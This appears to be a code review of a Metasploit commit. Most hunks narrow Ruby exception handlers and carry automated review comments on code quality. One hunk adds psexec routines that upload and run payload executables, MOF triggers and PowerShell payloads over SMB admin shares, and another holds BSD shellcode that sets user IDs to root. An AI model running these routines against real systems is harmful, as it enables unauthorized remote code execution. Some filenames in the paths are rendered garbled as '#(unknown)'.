data_service = self.get_data_service
|
||||
data_service.update_workspace(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem updating workspace")
|
||||
end
|
||||
end
|
||||
|
|
|
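Review bot: In the `@ -51` hunk the `begin`/`rescue` wraps a single instance-variable assignment, which does not raise a StandardError in normal operation, so the handler is dead code and the narrowing only makes that more visible; the setter reads better as `def workspace=(workspace)` / `@current_workspace = workspace` / `end`. The `@ -27` and `@ -42` hunks chain in a way worth a second look: if `workspaces` fails, `default_workspace` logs and returns nil, and the `warn "... #{default_workspace.name}"` line then raises NoMethodError on nil, which the outer `rescue => e` reports as "Problem retrieving workspace" rather than the original cause. Consider guarding `ws` before `ws.name` or re-raising after `log_error` in `default_workspace`. The method headers for those two hunks are outside the visible lines.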
@ -20,7 +20,7 @@ module ResponseDataHelper
|
|||
return JSON.parse(body).symbolize_keys
|
||||
end
|
||||
end
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
elog "Error parsing response: #{e.message}"
|
||||
e.backtrace.each { |line| elog line }
|
||||
end
|
||||
|
@ -36,7 +36,7 @@ module ResponseDataHelper
|
|||
if !body.nil? && !body.empty?
|
||||
return JSON.parse(body, object_class: OpenStruct)
|
||||
end
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
elog "open struct conversion failed #{e.message}"
|
||||
end
|
||||
end
|
||||
|
@ -64,7 +64,7 @@ module ResponseDataHelper
|
|||
end
|
||||
return rv
|
||||
end
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
elog "Mdm Object conversion failed #{e.message}"
|
||||
e.backtrace.each { |line| elog "#{line}\n" }
|
||||
end
|
||||
|
@ -87,7 +87,7 @@ module ResponseDataHelper
|
|||
unless File.exists?(save_path) && File.read(save_path) == decoded_file
|
||||
File.open(save_path, 'w+') { |file| file.write(decoded_file) }
|
||||
end
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
elog "There was an error writing the file: #{e}"
|
||||
e.backtrace.each { |line| elog "#{line}\n"}
|
||||
end
|
||||
|
|
|
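Review bot: In the `@ -87` hunk `File.exists?` is the deprecated alias and should be `File.exist?`; the alias has been removed in recent Ruby releases. The `rescue => e` there still turns a failed write into a logged message and a nil return, so the caller cannot tell that `save_path` was not written — consider re-raising after the `elog` lines or returning a boolean. `'w+'` also opens the file read-write although the block only writes; `'w'` is enough. The method header and the origin of `save_path` and `decoded_file` are outside the hunk.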
@ -1,19 +1,19 @@
|
|||
module NoteDataService
|
||||
|
||||
def notes(opts)
|
||||
raise NotImplementedError, 'NoteDataService#notes is not implemented'
|
||||
raise 'NoteDataService#notes is not implemented'
|
||||
end
|
||||
|
||||
def report_note(opts)
|
||||
raise NotImplementedError, 'NoteDataService#report_note is not implemented'
|
||||
raise 'NoteDataService#report_note is not implemented'
|
||||
end
|
||||
|
||||
def update_note(opts)
|
||||
raise NotImplementedError, 'NoteDataService#update_note is not implemented'
|
||||
raise 'NoteDataService#update_note is not implemented'
|
||||
end
|
||||
|
||||
def delete_note(opts)
|
||||
raise NotImplementedError, 'NoteDataService#delete_note is not implemented'
|
||||
raise 'NoteDataService#delete_note is not implemented'
|
||||
end
|
||||
|
||||
end
|
|
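Review bot: Replacing `raise NotImplementedError, '…'` with a bare `raise '…'` in the four stubs (the print order suggests the bare form is the new side) makes them raise RuntimeError, which the `rescue => e` handlers introduced elsewhere in this commit will catch; that looks intentional, since NotImplementedError is a ScriptError and escapes a bare rescue. The cost is that callers can no longer tell "not implemented" apart from any other runtime failure by class. A dedicated `class NotImplemented < StandardError; end` in the module, raised as `raise NotImplemented, 'NoteDataService#notes is not implemented'`, keeps the message and the catchability while keeping the failure identifiable.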
@ -5,7 +5,7 @@ module Metasploit
|
|||
module Framework
|
||||
module LoginScanner
|
||||
|
||||
class BavisionCamerasException < Exception; end
|
||||
class BavisionCamerasException < StandardError; end
|
||||
|
||||
class BavisionCameras < HTTP
|
||||
|
||||
|
|
|
@ -235,12 +235,13 @@ class DataStore < Hash
|
|||
# Override merge! so that we merge the aliases and imported hashes
|
||||
#
|
||||
def merge!(other)
|
||||
super
|
||||
if other.is_a? DataStore
|
||||
self.aliases.merge!(other.aliases)
|
||||
self.imported.merge!(other.imported)
|
||||
self.imported_by.merge!(other.imported_by)
|
||||
end
|
||||
# call super last so that we return a reference to ourselves
|
||||
super
|
||||
end
|
||||
|
||||
#
|
||||
|
|
|
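Review bot: With `super` moved after the `if`, the `aliases`, `imported` and `imported_by` tables are updated before the hash entries themselves, so if `super` then raises (a frozen receiver, for instance) the store is left with aliases for keys it never received. Since `Hash#merge!` returns self anyway, the return-value fix does not need the reorder: put `super` back before the `if` and finish the method with an explicit `self`. The bare `super` still forwards any block given to `merge!`, so that part is unaffected either way.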
@ -20,7 +20,7 @@ class JobProcessor
|
|||
wrapper = @job_queue.pop()
|
||||
begin
|
||||
wrapper.job.call(wrapper.job_args)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
print_error "Error executing job #{e.message}", e
|
||||
end
|
||||
end
|
||||
|
|
|
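Review bot: Narrowing to `rescue => e` means a job that raises a non-StandardError — a ScriptError such as NotImplementedError, or NoMemoryError — now escapes the `begin` block and ends the worker loop, whose head is outside the hunk, rather than being reported by `print_error`. If that is intended, the thread should at least report its own death (`Thread.current.report_on_exception = true` before the loop); if the processor must outlive any job failure, widen the handler to `rescue StandardError, ScriptError => e`. Either way a one-line comment stating which exceptions are meant to stop the processor would help the next reader.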
@ -27,7 +27,7 @@ module CredentialServlet
|
|||
response << json
|
||||
end
|
||||
set_json_response(response)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
|
|
@ -24,7 +24,7 @@ module DbExportServlet
|
|||
response = {}
|
||||
response[:db_export_file] = encoded_file
|
||||
set_json_response(response)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
ensure
|
||||
# Ensure the temporary file gets cleaned up
|
||||
|
|
|
@ -32,7 +32,7 @@ module HostServlet
|
|||
data = get_db.hosts(sanitized_params)
|
||||
includes = [:loots]
|
||||
set_json_response(data, includes)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
@ -45,7 +45,7 @@ module HostServlet
|
|||
data = get_db.report_host(opts)
|
||||
}
|
||||
exec_report_job(request, &job)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
@ -59,7 +59,7 @@ module HostServlet
|
|||
opts[:id] = tmp_params[:id] if tmp_params[:id]
|
||||
data = get_db.update_host(opts)
|
||||
set_json_response(data)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
@ -71,7 +71,7 @@ module HostServlet
|
|||
opts = parse_json_request(request, false)
|
||||
data = get_db.delete_host(opts)
|
||||
set_json_response(data)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
|
|
@ -30,7 +30,7 @@ module LootServlet
|
|||
loot.data = Base64.urlsafe_encode64(loot.data) if loot.data
|
||||
end
|
||||
set_json_response(data, includes)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
@ -60,7 +60,7 @@ module LootServlet
|
|||
opts[:id] = tmp_params[:id] if tmp_params[:id]
|
||||
data = get_db.update_loot(opts)
|
||||
set_json_response(data)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
@ -72,7 +72,7 @@ module LootServlet
|
|||
opts = parse_json_request(request, false)
|
||||
data = get_db.delete_loot(opts)
|
||||
set_json_response(data)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
|
|
@ -27,7 +27,7 @@ module NoteServlet
|
|||
data = get_db.notes(sanitized_params)
|
||||
includes = [:host]
|
||||
set_json_response(data, includes)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
@ -40,7 +40,7 @@ module NoteServlet
|
|||
get_db.report_note(opts)
|
||||
}
|
||||
exec_report_job(request, &job)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
@ -54,7 +54,7 @@ module NoteServlet
|
|||
opts[:id] = tmp_params[:id] if tmp_params[:id]
|
||||
data = get_db.update_note(opts)
|
||||
set_json_response(data)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
@ -66,7 +66,7 @@ module NoteServlet
|
|||
opts = parse_json_request(request, false)
|
||||
data = get_db.delete_note(opts)
|
||||
set_json_response(data)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
|
|
@ -26,7 +26,7 @@ module ServiceServlet
|
|||
data = get_db.services(opts)
|
||||
includes = [:host]
|
||||
set_json_response(data, includes)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
@ -48,7 +48,7 @@ module ServiceServlet
|
|||
opts[:id] = tmp_params[:id] if tmp_params[:id]
|
||||
data = get_db.update_service(opts)
|
||||
set_json_response(data)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
@ -60,7 +60,7 @@ module ServiceServlet
|
|||
opts = parse_json_request(request, false)
|
||||
data = get_db.delete_service(opts)
|
||||
set_json_response(data)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
|
|
@ -19,7 +19,7 @@ module SessionEventServlet
|
|||
opts = parse_json_request(request, false)
|
||||
data = get_db().session_events(opts)
|
||||
set_json_response(data)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
|
|
@ -18,7 +18,7 @@ module SessionServlet
|
|||
#opts = parse_json_request(request, false)
|
||||
data = get_db().get_all_sessions()
|
||||
set_json_response(data)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
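Review bot: The commented-out `#opts = parse_json_request(request, false)` on the first line of the hunk is dead code carried onto the new side; either delete it or, if the GET is meant to accept a filter body as SessionEventServlet does, restore it and pass `opts` to `get_db().get_all_sessions()`. The `get_db()` call with empty parentheses also differs from the `get_db.` form the other servlets in this commit use; aligning it is a small style win.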
|
||||
|
|
|
@ -23,7 +23,7 @@ module VulnAttemptServlet
|
|||
opts = parse_json_request(request, false)
|
||||
data = get_db.vuln_attempts(params.symbolize_keys)
|
||||
set_json_response(data)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
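Review bot: `opts = parse_json_request(request, false)` is assigned and then ignored; the lookup on the next line uses `params.symbolize_keys` instead. Either the parsed request body is meant to drive the query, in which case it should read `data = get_db.vuln_attempts(opts)`, or the assignment is dead and should be removed; I cannot tell which from the hunk, though the sibling update/delete handlers in this commit do pass `opts` through.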
|
||||
|
@ -39,7 +39,7 @@ module VulnAttemptServlet
|
|||
get_db.report_vuln_attempt(vuln, opts)
|
||||
}
|
||||
exec_report_job(request, &job)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
|
|
@ -27,7 +27,7 @@ module VulnServlet
|
|||
data = get_db.vulns(sanitized_params)
|
||||
includes = [:host, :vulns_refs, :refs, :module_refs]
|
||||
set_json_response(data, includes)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
@ -40,7 +40,7 @@ module VulnServlet
|
|||
get_db.report_vuln(opts)
|
||||
}
|
||||
exec_report_job(request, &job)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
@ -54,7 +54,7 @@ module VulnServlet
|
|||
opts[:id] = tmp_params[:id] if tmp_params[:id]
|
||||
data = get_db.update_vuln(opts)
|
||||
set_json_response(data)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
@ -66,7 +66,7 @@ module VulnServlet
|
|||
opts = parse_json_request(request, false)
|
||||
data = get_db.delete_vuln(opts)
|
||||
set_json_response(data)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
|
|
@ -29,7 +29,7 @@ module WorkspaceServlet
|
|||
data = get_db.workspaces(sanitized_params)
|
||||
|
||||
set_json_response(data, includes)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
@ -41,7 +41,7 @@ module WorkspaceServlet
|
|||
opts = parse_json_request(request, true)
|
||||
workspace = get_db.add_workspace(opts)
|
||||
set_json_response(workspace)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
@ -55,7 +55,7 @@ module WorkspaceServlet
|
|||
opts[:id] = tmp_params[:id] if tmp_params[:id]
|
||||
data = get_db.update_workspace(opts)
|
||||
set_json_response(data)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
@ -67,7 +67,7 @@ module WorkspaceServlet
|
|||
opts = parse_json_request(request, false)
|
||||
data = get_db.delete_workspaces(opts)
|
||||
set_json_response(data)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
|
|
|
@ -47,7 +47,7 @@ module ServletHelper
|
|||
return set_json_response(data, includes)
|
||||
end
|
||||
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
end
|
||||
|
|
|
@ -2,6 +2,8 @@
|
|||
require 'rex/proto/dcerpc/svcctl'
|
||||
require 'windows_error'
|
||||
require 'windows_error/win32'
|
||||
require 'msf/core/exploit/exe'
|
||||
require 'msf/core/exploit/wbemexec'
|
||||
|
||||
include WindowsError::Win32
|
||||
|
||||
|
@ -20,6 +22,7 @@ module Exploit::Remote::SMB::Client::Psexec
|
|||
include Msf::Exploit::Windows_Constants
|
||||
include Msf::Exploit::Remote::DCERPC
|
||||
include Msf::Exploit::Remote::SMB::Client::Authenticated
|
||||
include Msf::Exploit::Failure
|
||||
|
||||
def initialize(info = {})
|
||||
super
|
||||
|
@ -193,6 +196,246 @@ module Exploit::Remote::SMB::Client::Psexec
|
|||
true
|
||||
end
|
||||
|
||||
end
|
||||
def powershell_installed?(smb_share, psh_path)
|
||||
share = "\\\\#{datastore['RHOST']}\\#{smb_share}"
|
||||
|
||||
case smb_share.upcase
|
||||
when 'ADMIN$'
|
||||
path = 'System32\\WindowsPowerShell\\v1.0\\powershell.exe'
|
||||
when 'C$'
|
||||
path = 'Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'
|
||||
else
|
||||
path = psh_path
|
||||
end
|
||||
|
||||
simple.connect(share)
|
||||
vprint_status("Checking for #{path}")
|
||||
if smb_file_exist?(path)
|
||||
vprint_status('PowerShell found')
|
||||
psh = true
|
||||
else
|
||||
vprint_status('PowerShell not found')
|
||||
psh = false
|
||||
end
|
||||
|
||||
simple.disconnect(share)
|
||||
psh
|
||||
end
|
||||
|
||||
def execute_command(text, bat, cmd)
|
||||
# Try and execute the provided command
|
||||
execute = "%COMSPEC% /C echo #{cmd} ^> %SYSTEMDRIVE%#{text} > #{bat} & %COMSPEC% /C start %COMSPEC% /C #{bat}"
|
||||
vprint_status("Executing the command...")
|
||||
begin
|
||||
return psexec(execute)
|
||||
rescue Rex::Proto::DCERPC::Exceptions::Error, Rex::Proto::SMB::Exceptions::Error => e
|
||||
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}", 'rex', LEV_3)
|
||||
print_error("Unable to execute specified command: #{e}")
|
||||
return false
|
||||
end
|
||||
end
|
||||
|
||||
def execute_command_with_output(text, bat, cmd, smb_share, r_ip, delay, rt)
|
||||
res = execute_command(text, bat, cmd)
|
||||
if res
|
||||
for i in 0..(rt)
|
||||
Rex.sleep(delay)
|
||||
# if the output file is still locked then the program is still likely running
|
||||
if (exclusive_access(text, smb_share, r_ip))
|
||||
break
|
||||
elsif (i == rt)
|
||||
print_error("Command seems to still be executing. Try increasing RETRY and DELAY")
|
||||
end
|
||||
end
|
||||
output = get_output(text, smb_share, r_ip)
|
||||
end
|
||||
|
||||
cleanup_after(bat, smb_share, r_ip)
|
||||
output
|
||||
end
|
||||
|
||||
def execute_powershell_payload
|
||||
ENV['MSF_SERVICENAME'] = datastore['SERVICE_NAME']
|
||||
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
|
||||
|
||||
if datastore['PSH::persist'] and not datastore['DisablePayloadHandler']
|
||||
print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option")
|
||||
end
|
||||
|
||||
# Execute the powershell command
|
||||
print_status("Executing the payload...")
|
||||
begin
|
||||
psexec(command)
|
||||
rescue StandardError => exec_command_error
|
||||
fail_with(Msf::Exploit::Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}")
|
||||
end
|
||||
end
|
||||
|
||||
def native_upload(smb_share)
|
||||
filename = "#{rand_text_alpha(8)}.exe"
|
||||
serviceencoder = ''
|
||||
|
||||
# Upload the shellcode to a file
|
||||
print_status("Uploading payload...")
|
||||
smbshare = smb_share
|
||||
fileprefix = ""
|
||||
# if SHARE = Users/sasha/ or something like this
|
||||
if smbshare =~ /.[\\\/]/
|
||||
subfolder = true
|
||||
smbshare = smb_share.dup
|
||||
smbshare = smbshare.gsub(/^[\\\/]/,"")
|
||||
folder_list = smbshare.split(/[\\\/]/)
|
||||
smbshare = folder_list[0]
|
||||
fileprefix = folder_list[1..-1].map {|a| a + "\\"}.join.gsub(/\\$/,"") if folder_list.length > 1
|
||||
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
|
||||
fd = smb_open("\\#{fileprefix}\\#(unknown)", 'rwct')
|
||||
else
|
||||
subfolder = false
|
||||
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
|
||||
fd = smb_open("\\#(unknown)", 'rwct')
|
||||
end
|
||||
exe = ''
|
||||
opts = { :servicename => service_name, :serviceencoder => serviceencoder}
|
||||
begin
|
||||
exe = generate_payload_exe_service(opts)
|
||||
|
||||
fd << exe
|
||||
ensure
|
||||
fd.close
|
||||
end
|
||||
|
||||
if subfolder
|
||||
print_status("Created \\#{fileprefix}\\#(unknown)...")
|
||||
else
|
||||
print_status("Created \\#(unknown)...")
|
||||
end
|
||||
|
||||
# Disconnect from the share
|
||||
simple.disconnect("\\\\#{datastore['RHOST']}\\#{smbshare}")
|
||||
|
||||
# define the file location
|
||||
if smb_share == 'ADMIN$'
|
||||
file_location = "%SYSTEMROOT%\\#(unknown)"
|
||||
elsif smb_share =~ /^[a-zA-Z]\$$/
|
||||
file_location = smb_share.slice(0,1) + ":\\#(unknown)"
|
||||
else
|
||||
file_location = "\\\\127.0.0.1\\#{smbshare}\\#{fileprefix}\\#(unknown)"
|
||||
end
|
||||
|
||||
psexec(file_location, false)
|
||||
|
||||
unless datastore['SERVICE_PERSIST']
|
||||
print_status("Deleting \\#(unknown)...")
|
||||
#This is not really useful but will prevent double \\ on the wire :)
|
||||
if smb_share =~ /.[\\\/]/
|
||||
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
|
||||
begin
|
||||
simple.delete("\\#{fileprefix}\\#(unknown)")
|
||||
rescue XCEPT::ErrorCode => e
|
||||
print_error("Delete of \\#{fileprefix}\\#(unknown) failed: #{e.message}")
|
||||
end
|
||||
else
|
||||
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
|
||||
begin
|
||||
simple.delete("\\#(unknown)")
|
||||
rescue XCEPT::ErrorCode => e
|
||||
print_error("Delete of \\#(unknown) failed: #{e.message}")
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
def mof_upload(smb_share)
|
||||
share = "\\\\#{datastore['RHOST']}\\ADMIN$"
|
||||
filename = "#{rand_text_alpha(8)}.exe"
|
||||
|
||||
# payload as exe
|
||||
print_status("Trying wbemexec...")
|
||||
print_status("Uploading Payload...")
|
||||
if smb_share != 'ADMIN$'
|
||||
print_error('Wbem will only work with ADMIN$ share')
|
||||
return
|
||||
end
|
||||
simple.connect(share)
|
||||
exe = generate_payload_exe
|
||||
fd = smb_open("\\system32\\#(unknown)", 'rwct')
|
||||
fd << exe
|
||||
fd.close
|
||||
print_status("Created %SystemRoot%\\system32\\#(unknown)")
|
||||
|
||||
# mof to cause execution of above
|
||||
mofname = rand_text_alphanumeric(14) + ".MOF"
|
||||
mof = generate_mof(mofname, filename)
|
||||
print_status("Uploading MOF...")
|
||||
fd = smb_open("\\system32\\wbem\\mof\\#{mofname}", 'rwct')
|
||||
fd << mof
|
||||
fd.close
|
||||
print_status("Created %SystemRoot%\\system32\\wbem\\mof\\#{mofname}")
|
||||
|
||||
# Disconnect from the ADMIN$
|
||||
simple.disconnect(share)
|
||||
end
|
||||
|
||||
private
|
||||
# Retrive output from command
|
||||
def get_output(file, smb_share, r_ip)
|
||||
print_status("Getting the command output...")
|
||||
output = smb_read_file(smb_share, r_ip, file)
|
||||
if output.nil?
|
||||
print_error("Error getting command output. #{$!.class}. #{$!}.")
|
||||
return
|
||||
end
|
||||
if output.empty?
|
||||
print_status("Command finished with no output")
|
||||
return
|
||||
end
|
||||
output
|
||||
end
|
||||
|
||||
# check if our process is done using these files
|
||||
def exclusive_access(*files, smb_share, r_ip)
|
||||
begin
|
||||
simple.connect("\\\\#{r_ip}\\#{smb_share}")
|
||||
rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
|
||||
print_status("Unable to get handle: #{accesserror}")
|
||||
return false
|
||||
end
|
||||
files.each do |file|
|
||||
begin
|
||||
print_status("checking if the file is unlocked")
|
||||
fd = smb_open(file, 'rwo')
|
||||
fd.close
|
||||
rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
|
||||
print_status("Unable to get handle: #{accesserror}")
|
||||
return false
|
||||
end
|
||||
simple.disconnect("\\\\#{r_ip}\\#{smb_share}")
|
||||
end
|
||||
return true
|
||||
end
|
||||
|
||||
def cleanup_after(*files, smb_share, r_ip)
|
||||
begin
|
||||
simple.connect("\\\\#{r_ip}\\#{smb_share}")
|
||||
rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
|
||||
print_error("Unable to connect for cleanup: #{accesserror}. Maybe you'll need to manually remove #{files.join(", "
|
||||
)} from the target.")
|
||||
return
|
||||
end
|
||||
print_status("Executing cleanup...")
|
||||
files.each do |file|
|
||||
begin
|
||||
smb_file_rm(file)
|
||||
rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanuperror
|
||||
print_error("Unable to cleanup #{file}. Error: #{cleanuperror}")
|
||||
end
|
||||
end
|
||||
left = files.collect{ |f| smb_file_exist?(f) }
|
||||
if left.any?
|
||||
print_error("Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.")
|
||||
else
|
||||
print_good("Cleanup was successful")
|
||||
end
|
||||
end
|
||||
end
|
||||
end
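Review bot: In `cleanup_after`, `left = files.collect{ |f| smb_file_exist?(f) }` yields an array of booleans, so the "manually remove …" message prints `true`/`false` rather than file names; `left = files.select { |f| smb_file_exist?(f) }` makes `left.join(", ")` name the files actually left on the share, and `cleanup_after` also never disconnects the share it connects to. In `exclusive_access`, `simple.disconnect("\\\\#{r_ip}\\#{smb_share}")` sits inside `files.each`, so with more than one file the second `smb_open` runs against an already-disconnected share, and the `return false` paths never disconnect at all; moving the disconnect after the loop (or into an `ensure`) fixes both. `mof_upload` writes with `fd << exe` / `fd.close` without the `begin … ensure fd.close end` that `native_upload` uses, so a write failure leaks the handle. The `#(unknown)` tokens inside the path strings of `native_upload` and `mof_upload` look like a rendering artifact of `#{filename}` interpolation rather than literal code, so I have not reviewed them as written.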
|
||||
|
|
|
@ -93,69 +93,69 @@ module Msf::Payload::Bsd
|
|||
def handle_x64_bsd_opts(pre, app)
|
||||
if (datastore['PrependSetresuid'])
|
||||
# setresuid(0, 0, 0)
|
||||
pre << "\x48\x31\xc0" +# xor rax, rax
|
||||
"\x48\x83\xc8\x4d" +# or rax, 77 (setgid=311>>2=77)
|
||||
"\x48\xc1\xe0\x02" +# shl rax, 2
|
||||
"\x48\x83\xf0\x03" +# xor rax, 3 (311&3=3)
|
||||
"\x48\x31\xff" +# xor rdi, rdi 0
|
||||
"\x48\x31\xf6" +# xor rsi, rsi 0
|
||||
"\x48\x31\xd2" +# xor rdx, rdx 0
|
||||
"\x0f\x05" # syscall
|
||||
pre << "\x48\x31\xc0" + # xor rax, rax
|
||||
"\x48\x83\xc8\x4d" + # or rax, 77 (setgid=311>>2=77)
|
||||
"\x48\xc1\xe0\x02" + # shl rax, 2
|
||||
"\x48\x83\xf0\x03" + # xor rax, 3 (311&3=3)
|
||||
"\x48\x31\xff" + # xor rdi, rdi 0
|
||||
"\x48\x31\xf6" + # xor rsi, rsi 0
|
||||
"\x48\x31\xd2" + # xor rdx, rdx 0
|
||||
"\x0f\x05" # syscall
|
||||
end
|
||||
|
||||
if (datastore['PrependSetreuid'])
|
||||
# setreuid(0, 0)
|
||||
pre << "\x48\x31\xc0" +# xor rax, rax
|
||||
"\x48\x83\xc8\x7e" +# or rax, 126 (setreuid=126)
|
||||
"\x48\x31\xff" +# xor rdi, rdi 0
|
||||
"\x48\x31\xf6" +# xor rsi, rsi 0
|
||||
"\x0f\x05" # syscall
|
||||
pre << "\x48\x31\xc0" + # xor rax, rax
|
||||
"\x48\x83\xc8\x7e" + # or rax, 126 (setreuid=126)
|
||||
"\x48\x31\xff" + # xor rdi, rdi 0
|
||||
"\x48\x31\xf6" + # xor rsi, rsi 0
|
||||
"\x0f\x05" # syscall
|
||||
end
|
||||
|
||||
if (datastore['PrependSetuid'])
|
||||
# setuid(0)
|
||||
pre << "\x48\x31\xc0" +# xor rax, rax
|
||||
"\x48\x83\xc8\x17" +# or rax, 23 (setuid=23)
|
||||
"\x48\x31\xff" +# xor rdi, rdi 0
|
||||
"\x0f\x05" # syscall
|
||||
pre << "\x48\x31\xc0" + # xor rax, rax
|
||||
"\x48\x83\xc8\x17" + # or rax, 23 (setuid=23)
|
||||
"\x48\x31\xff" + # xor rdi, rdi 0
|
||||
"\x0f\x05" # syscall
|
||||
end
|
||||
|
||||
if (datastore['PrependSetresgid'])
|
||||
# setresgid(0, 0, 0)
|
||||
pre << "\x48\x31\xc0" +# xor rax, rax
|
||||
"\x48\x83\xc8\x4e" +# or rax, 78 (setgid=312>>2=78)
|
||||
"\x48\xc1\xe0\x02" +# shl rax, 2 (78<<2=312)
|
||||
"\x48\x31\xff" +# xor rdi, rdi 0
|
||||
"\x48\x31\xf6" +# xor rsi, rsi 0
|
||||
"\x48\x31\xd2" +# xor rdx, rdx 0
|
||||
"\x0f\x05" # syscall
|
||||
pre << "\x48\x31\xc0" + # xor rax, rax
|
||||
"\x48\x83\xc8\x4e" + # or rax, 78 (setgid=312>>2=78)
|
||||
"\x48\xc1\xe0\x02" + # shl rax, 2 (78<<2=312)
|
||||
"\x48\x31\xff" + # xor rdi, rdi 0
|
||||
"\x48\x31\xf6" + # xor rsi, rsi 0
|
||||
"\x48\x31\xd2" + # xor rdx, rdx 0
|
||||
"\x0f\x05" # syscall
|
||||
end
|
||||
|
||||
if (datastore['PrependSetregid'])
|
||||
# setregid(0, 0)
|
||||
pre << "\x48\x31\xc0" +# xor rax, rax
|
||||
"\x48\x83\xc8\x7f" +# or rax, 127 (setuid=127)
|
||||
"\x48\x31\xff" +# xor rdi, rdi 0
|
||||
"\x48\x31\xf6" +# xor rsi, rsi 0
|
||||
"\x0f\x05" # syscall
|
||||
pre << "\x48\x31\xc0" + # xor rax, rax
|
||||
"\x48\x83\xc8\x7f" + # or rax, 127 (setuid=127)
|
||||
"\x48\x31\xff" + # xor rdi, rdi 0
|
||||
"\x48\x31\xf6" + # xor rsi, rsi 0
|
||||
"\x0f\x05" # syscall
|
||||
end
|
||||
|
||||
if (datastore['PrependSetgid'])
|
||||
# setgid(0)
|
||||
pre << "\x48\x31\xc0" +# xor rax, rax
|
||||
"\x48\x83\xc8\x5a" +# or rax, 90 (setgid=181>>1=90)
|
||||
"\x48\xd1\xe0" +# shl rax, 1
|
||||
"\x48\x83\xc8\x01" +# or rax, 1 (setgid=181&1=1)
|
||||
"\x48\x31\xff" +# xor rdi, rdi 0
|
||||
"\x0f\x05" # syscall
|
||||
pre << "\x48\x31\xc0" + # xor rax, rax
|
||||
"\x48\x83\xc8\x5a" + # or rax, 90 (setgid=181>>1=90)
|
||||
"\x48\xd1\xe0" + # shl rax, 1
|
||||
"\x48\x83\xc8\x01" + # or rax, 1 (setgid=181&1=1)
|
||||
"\x48\x31\xff" + # xor rdi, rdi 0
|
||||
"\x0f\x05" # syscall
|
||||
end
|
||||
|
||||
if (datastore['AppendExit'])
|
||||
# exit(0)
|
||||
app << "\x48\x31\xc0" +# xor rax, rax
|
||||
"\x48\x83\xc8\x01" +# or rax, 1 (exit=1)
|
||||
"\x48\x31\xff" +# xor rdi, rdi 0
|
||||
